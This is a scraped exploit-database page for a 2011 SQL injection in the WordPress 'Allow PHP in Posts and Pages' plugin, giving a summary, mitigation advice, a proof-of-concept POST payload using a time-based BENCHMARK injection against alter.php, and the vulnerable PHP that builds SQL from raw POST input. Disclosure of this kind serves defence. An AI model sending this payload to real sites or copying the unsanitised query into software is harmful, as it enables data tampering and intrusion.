Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
WordPress Allow PHP in Posts and Pages plugin - exploit.company
header-logo
Suggest Exploit
vendor:
Allow PHP in Posts and Pages plugin
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Allow PHP in Posts and Pages plugin
Affected Version From: <= 2.0.0.RC1
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: WordPress
2011

WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection by manipulating the 'function' parameter in a POST request to the 'alter.php' file. By injecting malicious SQL code, an attacker can modify or delete data in the database.

Mitigation:

Update to the latest version of the plugin or disable it if not needed. Sanitize user input before using it in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/allow-php-in-posts-and-pages.zip
# Version: 2.0.0.RC1 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/allow-php-in-posts-and-pages/alter.php
 allowPHPNonce=-1&action=modify&function=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
    if(!isset($_POST['allowPHPNonce'])){
        if ( !wp_verify_nonce( $_POST['allowPHPNonce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
    }
    else{
        if(!isset($_POST['action']) || !defined ('ABSPATH')){header("location:".$refer);}
        if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
        if(isset($_POST['function'])){$function = $_POST['function'];}else{$function="";}
        if(isset($_POST['name'])){$name = $_POST['name'];}else{$name="";}
        $action = $_POST['action'];

		#delete
        if($action == "delete"){

        ...

        elseif($action == "modify" && $function != ""){
            $sql = "update ".$wpdb->prefix."allowPHP_functions set function='".$function."', name='".$name."' where id = ".$id;
            $results = $wpdb->get_results($wpdb->prepare($sql));

Navigation

Suggest Exploit

Services By CQR